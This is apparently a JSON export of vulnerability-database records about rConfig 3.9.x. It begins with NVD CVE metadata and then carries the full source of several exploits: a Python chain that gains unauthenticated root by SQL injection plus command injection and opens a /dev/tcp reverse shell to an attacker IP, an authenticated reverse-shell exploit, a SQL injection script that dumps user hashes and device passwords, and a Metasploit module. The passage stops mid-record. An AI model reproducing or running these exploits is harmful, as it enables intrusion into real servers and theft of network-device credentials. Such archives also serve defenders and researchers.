"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-01-06T20:15:00", "title": "CVE-2019-19585", "type": "cve", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-19585"], "modified": "2020-03-28T17:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.3"], "id": "CVE-2019-19585", "href": 
"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-19585", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T22:03:04", "description": "An issue was discovered in rConfig through 3.9.4. The web interface is prone to a SQL injection via the commands.inc.php searchColumn parameter.", "edition": 10, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-03-07T23:15:00", "title": "CVE-2020-10220", "type": "cve", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T22:15:00", "cpe": ["cpe:/a:rconfig:rconfig:3.9.4"], "id": "CVE-2020-10220", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-10220", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*"]}], "exploitpack": [{"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9.4 - searchField Unauthenticated Root Remote Code Execution", "edition": 1, "published": "2020-03-27T00:00:00", "title": "rConfig 3.9.4 - 
searchField Unauthenticated Root Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-27T00:00:00", "id": "EXPLOITPACK:B08CB2D0FD65D2459D536B8624991694", "href": "", "sourceData": "# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution\n# Exploit Author: vikingfr\n# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com)\n# Date: 2020-03-12\n# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n# Install scripts :\n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\n# Version: tested v3.9.4\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# Example :\n# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334\n# rConfig - 3.9 - Unauthenticated root RCE\n# [+] Adding a temporary admin user...\n# [+] Authenticating as dywzxuvbah...\n# [+] Logged in successfully, triggering the payload...\n# [+] Check your listener !\n# [+] The reverse shell seems to be opened :-)\n# [+] Removing the temporary admin user...\n# [+] Done.\n#\n# $ nc -nvlp 3334\n# listening on [any] 3334 ...\n# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186\n# sh: no job control in this shell\n# sh-4.2# id\n# id\n# uid=0(root) gid=0(root) groups=0(root)\n# sh-4.2# \n\n#!/usr/bin/python3\nimport 
requests\nimport sys\nimport urllib.parse\nimport string\nimport random\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nfrom requests.exceptions import Timeout\n\nprint (\"rConfig - 3.9 - Unauthenticated root RCE\")\n\nif len(sys.argv) != 4:\n print (\"[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort\")\n exit()\n\ntarget = sys.argv[1]\nip = sys.argv[2]\nport = sys.argv[3]\n\nvuln_page=\"/commands.inc.php\"\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\ndef generateUsername(stringLength=8):\n u= string.ascii_lowercase\n return ''.join(random.sample(u,stringLength))\n\nprint (\"[+] Adding a temporary admin user...\")\nfake_id = str(random.randint(200,900))\nfake_user = generateUsername(10)\nfake_pass_md5 = \"21232f297a57a5a743894a0e4a801fc3\" # hash of 'admin'\nfake_userid_md5 = \"6c97424dc92f14ae78f8cc13cd08308d\"\nuserleveladmin = 9 # Administrator\naddUserPayload=\"%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(\"+fake_id+\",%20'\"+fake_user+\"',%20'\"+fake_pass_md5+\"',%20'\"+fake_userid_md5+\"',%209,%20'\"+fake_user+\"@domain.com',%201346920339,%201);--\"\nencoded_request = target+vuln_page+vuln_parameters+addUserPayload\nfirstrequest = requests.session()\nexploit_req = firstrequest.get(encoded_request,verify=False)\n\nrequest = requests.session()\nlogin_info = {\n \"user\": fake_user,\n \"pass\": \"admin\",\n \"sublogin\": 1\n}\nprint (\"[+] Authenticating as \"+fake_user+\"...\")\nlogin_request = request.post(\n target+\"/lib/crud/userprocess.php\",\n login_info,\n verify=False,\n allow_redirects=True\n )\n\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\n\npayload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T 
-TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port)\nif dashboard_request.status_code == 200:\n print (\"[+] Logged in successfully, triggering the payload...\")\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\n print (\"[+] Check your listener !\")\n try:\n exploit_req = request.get(encoded_request,timeout=10) \n except Timeout:\n print('[+] The reverse shell seems to be opened :-)')\n else:\n print('[-] The command was not executed by the target or you forgot to open a listener...')\n\nelif dashboard_request.status_code == 302:\n print (\"[-] Wrong credentials !? Maybe admin were not added...\")\n exit()\n\nprint(\"[+] Removing the temporary admin user...\")\ndelUserPayload=\"%20;DELETE%20FROM%20`users`%20WHERE%20`username`='\"+fake_user+\"';--\"\nencoded_request = target+vuln_page+vuln_parameters+delUserPayload\nlastrequest = requests.session()\nexploit_req = lastrequest.get(encoded_request,verify=False)\nprint (\"[+] Done.\")", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9.3 - Authenticated Remote Code Execution", "edition": 1, "published": "2020-01-30T00:00:00", "title": "rConfig 3.9.3 - Authenticated Remote Code Execution", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "EXPLOITPACK:70190622C383FFD1E3346CCB252B46A2", "href": "", "sourceData": "# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution\n# Date: 2019-11-07\n# CVE-2019-19509\n# Exploit Author: vikingfr\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh\n# Version: tested v3.9.3\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow 
those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081\n# rconfig - CVE-2019-19509 - Web authenticated RCE\n# [+] Logged in successfully, triggering the payload...\n# [+] Check your listener !\n# ...\n# $ nc -nvlp 8081\n# listening on [any] 8081 ...\n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458\n# bash: no job control in this shell\n# bash-4.2$ id\n# id\n# uid=48(apache) gid=48(apache) groups=48(apache)\n# bash-4.2$ \n\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\")\n\nif len(sys.argv) != 6:\n print (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\")\n exit()\n\ntarget = sys.argv[1]\nusername = sys.argv[2]\npassword = sys.argv[3]\nip = sys.argv[4]\nport = sys.argv[5]\npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port)\n\nrequest = requests.session()\n\nlogin_info = {\n \"user\": username,\n \"pass\": password,\n \"sublogin\": 1\n}\n\nlogin_request = request.post(\n target+\"/lib/crud/userprocess.php\",\n login_info,\n verify=False,\n allow_redirects=True\n )\n\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\n\nif dashboard_request.status_code == 200:\n print (\"[+] Logged in successfully, triggering the payload...\")\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\n print (\"[+] Check your listener !\")\n exploit_req = request.get(encoded_request)\n\nelif dashboard_request.status_code == 302:\n print (\"[-] Wrong credentials !\")\n exit()", "cvss": {"score": 9.0, "vector": 
"AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9 - searchColumn SQL Injection", "edition": 1, "published": "2020-03-12T00:00:00", "title": "rConfig 3.9 - searchColumn SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": "EXPLOITPACK:D4882FF7F5ED2734A7C626D4055DCEDE", "href": "", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\n# Exploit Author: vikingfr\n# Date: 2020-03-03\n# CVE-2020-10220\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\n# Version: tested v3.9.4\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# $ python3 rconfig_sqli.py https://1.1.1.1\n# rconfig 3.9 - SQL Injection PoC\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\n# [+] Extracting the current DB name :\n# rconfig2\n# [+] Extracting 10 first users :\n# admin:1:63a9f0ea7bb98050796b649e85481845\n# Maybe no more information ?\n# Maybe no more information ?\n# [snip]\n# [+] Extracting 10 first devices :\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\n# Maybe no more information ?\n# Maybe no more information ?\n# [snip]\n# Done\n \n\n#!/usr/bin/python3\nimport requests\nimport sys\nimport urllib.parse\nfrom 
requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nprint (\"rconfig 3.9 - SQL Injection PoC\")\nif len(sys.argv) != 2:\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\n exit()\n\nvuln_page=\"/commands.inc.php\"\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\ngiven_target = sys.argv[1]\ntarget = given_target\ntarget += vuln_page\ntarget += vuln_parameters\n\nrequest = requests.session()\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\n\n\ndef extractDBinfos(myTarget=None,myPayload=None):\n\t\"\"\"\n\tExtract information from database\n\tArgs:\n\t\t- target+payload (String)\n\tReturns:\n\t\t- payload result (String)\n\t\"\"\"\n\tresult = \"\"\n\tencoded_request = myTarget+myPayload\n\texploit_req = request.get(encoded_request)\n\tif '[PWN]' in str(exploit_req.content):\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\n\telse:\n\t\tresult=\"Maybe no more information ?\"\n\t\n\treturn result\n\n\nif dashboard_request.status_code != 404:\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\n\t# get the db name\n\tprint (\"[+] Extracting the current DB name :\")\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\n\tdb_name = extractDBinfos(target,db_payload)\n\tprint (db_name)\n # DB extract users\n\tprint (\"[+] Extracting 10 first users :\")\n\tfor i in range (0, 10):\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\n user_h = extractDBinfos(target,user1_payload)\n #print (\"[+] Dump device \"+str(i))\n print (user_h)\n # DB extract devices information\n\tprint (\"[+] Extracting 10 first devices :\")\n\tfor 
i in range (0, 10):\n device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\n device_h = extractDBinfos(target,device_payload)\n #print (\"[+] Dump device \"+str(i))\n print (device_h)\n \n\tprint (\"Done\")\n\t \nelse:\n print (\"[-] Please verify the URI\")\n exit()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-19T23:37:23", "description": "", "published": "2020-03-16T00:00:00", "type": "packetstorm", "title": "Rconfig 3.x Chained Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-16T00:00:00", "id": "PACKETSTORM:156766", "href": "https://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Rconfig 3.x Chained Remote Code Execution', \n'Description' => ' \nThis module exploits multiple vulnerabilities in rConfig version 3.9 \nin order to execute arbitrary commands. \nThis module takes advantage of a command injection vulnerability in the \n`path` parameter of the ajax archive file functionality within the rConfig web \ninterface in order to execute the payload. \nValid credentials for a user with administrative privileges are required. \nHowever, this module can bypass authentication via SQLI. \nThis module has been successfully tested on Rconfig 3.9.3 and 3.9.4. \nThe steps are: \n1. 
SQLi on /commands.inc.php allows us to add an administrative user. \n2. An authenticated session is established with the newly added user \n3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to \nexecute the payload. \n4. Remove the added admin user. \nTips : once you get a shell, look at the CVE-2019-19585. \nYou will probably get root because rConfig install script add Apache user to \nsudoers with nopasswd ;-) \n', \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module \n'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/) \n], \n'References' => \n[ \n['CVE', '2019-19509'], # authenticated rce \n['CVE', '2020-10220'], # sqli auth bypass \n%w[EDB 47982], \n%w[EDB 48208], \n['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE \n['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi \n], \n'Platform' => %w[unix linux], \n'Arch' => ARCH_CMD, \n'Targets' => [['Auto', {}]], \n'Privileged' => false, \n'DisclosureDate' => '2020-03-11', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects \n'PAYLOAD' => 'generic/shell_reverse_tcp' \n}, \n'DefaultTarget' => 0)) \nregister_options [ \nOptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']) \n] \nend \n \n# CHECK IF RCONFIG IS REACHABLE AND INSTALLED \ndef check \nvprint_status 'STEP 0: Get rConfig version...' \nres = send_request_cgi!( \n'method' => 'GET', \n'uri' => '/login.php' \n) \nif !res || !res.get_html_document \nfail_with(Failure::Unknown, 'Could not check rConfig version') \nend \nif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 
'rConfig Version 3.9' \nprint_good('rConfig version 3.9 detected') \nreturn Exploit::CheckCode::Appears \nelsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig' \nprint_status('rConfig detected, but not version 3.9') \nreturn Exploit::CheckCode::Detected \nend \nend \n \n# CREATE AN ADMIN USER IN RCONFIG \ndef create_rconfig_user(user, _password) \nvprint_status 'STEP 1 : Adding a temporary admin user...' \nfake_id = Rex::Text.rand_text_numeric(3) \nfake_pass = Rex::Text.rand_text_alpha(10) \nfake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin' \nfake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d' \nuserleveladmin = 9 # Administrator \nuser_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\" \nsqli_res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), \n'method' => 'GET', \n'vars_get' => { \n'search' => 'search', \n'searchOption' => 'contains', \n'searchField' => 'vuln', \n'searchColumn' => user_sqli \n} \n) \nunless sqli_res \nprint_warning('Failed to create user: Connection failed.') \nreturn \nend \nprint_good \"New temporary user #{user} created\" \nend \n \n# AUTHENTICATE ON RCONFIG \ndef login(user, pass) \nvprint_status \"STEP 2: Authenticating as #{user} ...\" \n# get session cookie (PHPSESSID) \nres = send_request_cgi!( \n'method' => 'GET', \n'uri' => '/login.php' \n) \n@cookie = res.get_cookies \nif @cookie.empty? 
\nfail_with Failure::UnexpectedReply, 'Failed to retrieve cookies' \nreturn \nend \n# authenticate \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'), \n'cookie' => @cookie, \n'vars_post' => { \npass: pass, \nuser: user, \nsublogin: 1 \n} \n) \nunless res \nprint_warning('Failed to authenticate: Connection failed.') \nreturn \nend \nprint_good \"Authenticated as user #{user}\" \nend \n \ndef trigger_rce(cmd, _opts = {}) \nvprint_status \"STEP 3: Executing the command (#{cmd})\" \ntrigger = \"`#{cmd} #`\" \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'), \n'cookie' => @cookie, \n'vars_get' => { \n'path' => trigger, \n'ext' => 'random' \n} \n) \n# the page hangs because of the command being executed, so we can't expect HTTP response \n# unless res \n# fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed' \n# return \n# end \n# unless res.body.include? '\"success\":true' \n# fail_with Failure::Unknown, 'It seems that the code was not executed' \n# return \n# end \nprint_good 'Command sucessfully executed' \nend \n \n# DELETE A USER \ndef delete_rconfig_user(user) \nvprint_status 'STEP 4 : Removing the temporary admin user...' \ndel_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\" \ndel_res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), \n'method' => 'GET', \n'vars_get' => { \n'search' => 'search', \n'searchOption' => 'contains', \n'searchField' => 'vuln', \n'searchColumn' => del_sqli \n} \n) \nunless del_res \nprint_warning \"Removing user #{user} failed: Connection failed. 
Please remove it manually.\" \nreturn \nend \nprint_status \"User #{user} removed successfully !\" \nend \n \ndef cleanup \nsuper \ndelete_rconfig_user @username if @username \nend \n \ndef exploit \ncheck \n@username = rand_text_alphanumeric(8..12) \n@password = 'admin' \ncreate_res = create_rconfig_user @username, @password \nlogin(@username, @password) \ntmp_txt_file = Rex::Text.rand_text_alpha(10) \ntmp_zip_file = Rex::Text.rand_text_alpha(10) \n# The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-( \n# trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\") \ntrigger_rce(payload.encoded.to_s) \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156766/rconfig_ajaxarchivefiles_rce.rb.txt"}, {"lastseen": "2020-03-29T07:14:53", "description": "", "published": "2020-03-28T00:00:00", "type": "packetstorm", "title": "rConfig 3.9.4 searchField Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-28T00:00:00", "id": "PACKETSTORM:156950", "href": "https://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution \n# Exploit Author: vikingfr \n# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) \n# Date: 2020-03-12 \n# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 \n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : 
https://www.rconfig.com/downloads/rconfig-3.9.4.zip \n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh \n# https://www.rconfig.com/downloads/scripts/centos7_install.sh \n# https://www.rconfig.com/downloads/scripts/centos6_install.sh \n# Version: tested v3.9.4 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# Example : \n# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 \n# rConfig - 3.9 - Unauthenticated root RCE \n# [+] Adding a temporary admin user... \n# [+] Authenticating as dywzxuvbah... \n# [+] Logged in successfully, triggering the payload... \n# [+] Check your listener ! \n# [+] The reverse shell seems to be opened :-) \n# [+] Removing the temporary admin user... \n# [+] Done. \n# \n# $ nc -nvlp 3334 \n# listening on [any] 3334 ... 
\n# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 \n# sh: no job control in this shell \n# sh-4.2# id \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# sh-4.2# \n \n#!/usr/bin/python3 \nimport requests \nimport sys \nimport urllib.parse \nimport string \nimport random \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nfrom requests.exceptions import Timeout \n \nprint (\"rConfig - 3.9 - Unauthenticated root RCE\") \n \nif len(sys.argv) != 4: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort\") \nexit() \n \ntarget = sys.argv[1] \nip = sys.argv[2] \nport = sys.argv[3] \n \nvuln_page=\"/commands.inc.php\" \nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\" \ndef generateUsername(stringLength=8): \nu= string.ascii_lowercase \nreturn ''.join(random.sample(u,stringLength)) \n \nprint (\"[+] Adding a temporary admin user...\") \nfake_id = str(random.randint(200,900)) \nfake_user = generateUsername(10) \nfake_pass_md5 = \"21232f297a57a5a743894a0e4a801fc3\" # hash of 'admin' \nfake_userid_md5 = \"6c97424dc92f14ae78f8cc13cd08308d\" \nuserleveladmin = 9 # Administrator \naddUserPayload=\"%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(\"+fake_id+\",%20'\"+fake_user+\"',%20'\"+fake_pass_md5+\"',%20'\"+fake_userid_md5+\"',%209,%20'\"+fake_user+\"@domain.com',%201346920339,%201);--\" \nencoded_request = target+vuln_page+vuln_parameters+addUserPayload \nfirstrequest = requests.session() \nexploit_req = firstrequest.get(encoded_request,verify=False) \n \nrequest = requests.session() \nlogin_info = { \n\"user\": fake_user, \n\"pass\": \"admin\", \n\"sublogin\": 1 \n} \nprint (\"[+] Authenticating as \"+fake_user+\"...\") \nlogin_request = request.post( \ntarget+\"/lib/crud/userprocess.php\", \nlogin_info, 
\nverify=False, \nallow_redirects=True \n) \n \ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False) \n \npayload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) \nif dashboard_request.status_code == 200: \nprint (\"[+] Logged in successfully, triggering the payload...\") \nencoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload)) \nprint (\"[+] Check your listener !\") \ntry: \nexploit_req = request.get(encoded_request,timeout=10) \nexcept Timeout: \nprint('[+] The reverse shell seems to be opened :-)') \nelse: \nprint('[-] The command was not executed by the target or you forgot to open a listener...') \n \nelif dashboard_request.status_code == 302: \nprint (\"[-] Wrong credentials !? Maybe admin were not added...\") \nexit() \n \nprint(\"[+] Removing the temporary admin user...\") \ndelUserPayload=\"%20;DELETE%20FROM%20`users`%20WHERE%20`username`='\"+fake_user+\"';--\" \nencoded_request = target+vuln_page+vuln_parameters+delUserPayload \nlastrequest = requests.session() \nexploit_req = lastrequest.get(encoded_request,verify=False) \nprint (\"[+] Done.\") \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156950/rconfig394sf-exec.txt"}, {"lastseen": "2020-01-30T22:55:52", "description": "", "published": "2020-01-30T00:00:00", "type": "packetstorm", "title": "rConfig 3.9.3 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "PACKETSTORM:156146", "href": "https://packetstormsecurity.com/files/156146/rConfig-3.9.3-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution \n# Date: 2019-11-07 \n# CVE-2019-19509 \n# Exploit Author: 
